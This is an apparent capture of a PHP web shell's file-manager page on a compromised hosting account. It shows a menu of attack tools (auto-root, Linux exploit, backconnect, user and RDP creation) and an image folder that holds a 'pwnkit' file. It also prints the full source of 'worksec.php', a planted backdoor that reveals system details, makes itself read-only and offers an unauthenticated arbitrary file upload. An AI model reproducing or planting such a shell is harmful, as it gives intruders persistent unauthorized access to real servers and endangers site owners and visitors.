Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
quaadraa /
assets /
images /
[ HOME SHELL ]
Name
Size
Permission
Action
activites
[ DIR ]
drwx---r-x
logos
[ DIR ]
drwx---r-x
news
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
1780059460_WhatsAppImage2026-0...
371.46
KB
-rw----r--
1780059538_WhatsAppImage2026-0...
167.1
KB
-rw----r--
1780174775_carpodiumdanslacamp...
66.54
KB
-rw----r--
1780174853_Danessocarpodiumyas...
577
KB
-rw----r--
2ca3566d783c5f13.jpg
602.77
KB
-rw-r--r--
about-1.jpeg
826.82
KB
-rw----r--
about-2.jpeg
163.51
KB
-rw----r--
about-3.jpeg
371.46
KB
-rw----r--
about-4.jpeg
167.1
KB
-rw----r--
about-5.jpeg
264.09
KB
-rw----r--
bg-hero-admin.jpeg
163.51
KB
-rw----r--
logo-quaadra.png
10.98
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
quaadrafavicon.png
4.2
KB
-rw----r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : worksec.php
<?php // Path to the file $file = 'worksec.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php error_reporting(0); set_time_limit(0); $user = get_current_user(); echo "<center><b>Uname:".php_uname()."<br></b>"; echo "<br><b>Base Dir : ".getcwd()."<br></b>"; echo "<br><b>User : ".$user."<br></b>"; echo '<br><font color="black" size="4">'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>"; } }else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?>
Close